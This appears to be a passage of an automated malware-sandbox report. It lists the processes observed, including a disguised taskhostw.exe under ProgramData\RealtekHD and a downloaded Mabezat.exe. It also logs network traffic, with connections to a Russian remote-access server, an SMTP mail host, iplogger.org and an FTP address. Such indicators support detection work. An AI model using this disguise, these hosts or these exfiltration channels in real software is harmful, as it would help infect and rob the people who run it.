"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_mobsync.zip\mobsync.dll

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:1

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:8

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:8

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.28.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 2.18.27.92:443 copilot.microsoft.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
IT 184.51.127.32:443 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com tcp
GB 2.18.27.82:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 2.18.27.82:443 www.bing.com udp
IE 23.216.155.137:443 www.bing.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
IT 184.51.127.32:443 assets.msn.com tcp
IT 184.51.127.32:443 assets.msn.com tcp
IT 184.51.127.32:443 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
IE 23.216.155.169:443 www.bing.com tcp
IT 184.51.127.32:443 assets.msn.com udp
US 150.171.28.10:443 c.bing.com tcp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.27.76:443 th.bing.com tcp
FR 13.249.9.46:443 sb.scorecardresearch.com tcp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 204.79.197.203:443 srtb.msn.com tcp
US 204.79.197.203:443 srtb.msn.com tcp
IE 23.216.155.169:443 www.bing.com udp
GB 2.18.27.76:443 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.74:443 login.microsoftonline.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.110.133:443 user-images.githubusercontent.com tcp
US 185.199.110.133:443 user-images.githubusercontent.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 140.82.114.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 2.18.27.76:443 th.bing.com udp
IE 23.216.155.169:443 www.bing.com udp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net udp
US 149.255.35.125:443 tcp
FR 51.178.195.151:443 tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 2.16.55.12:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
FR 51.178.195.151:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 deff.nelreports.net udp
US 8.8.8.8:53 deff.nelreports.net udp
IT 184.51.127.41:443 deff.nelreports.net tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
IE 2.19.176.96:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
CA 51.222.39.81:443 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
FR 51.77.7.204:443 tcp
CA 51.222.39.81:443 tcp
US 149.255.35.125:443 tcp
US 38.68.50.179:443 tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 77.223.119.187:5655 rms-server.tektonit.ru tcp
US 38.68.50.179:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
IE 23.216.155.155:443 www.bing.com udp
IE 23.216.155.155:443 www.bing.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
IE 23.216.155.139:443 th.bing.com udp
IE 23.216.155.170:443 r.bing.com udp
IE 23.216.155.139:443 th.bing.com udp
US 8.8.8.8:53 rewards.bing.com udp
US 8.8.8.8:53 rewards.bing.com udp
US 150.171.27.10:443 rewards.bing.com tcp
RU 109.248.203.81:21 tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.74:443 login.microsoftonline.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
GB 79.127.237.132:443 www.dll-files.com tcp
GB 79.127.237.132:443 www.dll-files.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 142.250.179.234:443 ajax.googleapis.com tcp
GB 142.250.179.234:443 ajax.googleapis.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 104.18.10.207:443 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 172.217.169.46:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 172.217.169.46:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 www.google.co.uk udp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 64.233.166.157:443 stats.g.doubleclick.net tcp
GB 142.250.178.3:443 www.google.co.uk udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.187.225:443 lh3.googleusercontent.com tcp
GB 172.217.169.46:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 172.217.169.34:443 ep1.adtrafficquality.google tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
FR 178.250.7.12:443 rtb.fr3.eu.criteo.com tcp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 ads.eu.criteo.com udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 cat.nl3.eu.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
US 8.8.8.8:53 measurement-api.criteo.com udp
GB 142.250.180.1:443 ep2.adtrafficquality.google tcp
NL 178.250.1.17:443 ads.eu.criteo.com tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.24:443 measurement-api.criteo.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
NL 178.250.1.39:443 static.criteo.net tcp
NL 178.250.1.39:443 static.criteo.net tcp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
US 8.8.8.8:53 imageproxy.eu.criteo.net udp
NL 178.250.1.6:443 cat.nl3.eu.criteo.com tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
US 8.8.8.8:53 rtb.fr3.eu.criteo.com udp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.15:443 imageproxy.eu.criteo.net tcp
NL 178.250.1.25:443 csm.eu.criteo.net tcp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com udp
GB 142.250.180.1:443 ep2.adtrafficquality.google tcp
NL 178.250.1.39:443 static.criteo.net tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 csm.eu.criteo.net udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
GB 142.250.180.1:443 ep2.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
GB 216.58.204.66:443 ep1.adtrafficquality.google udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 csm.eu.criteo.net udp
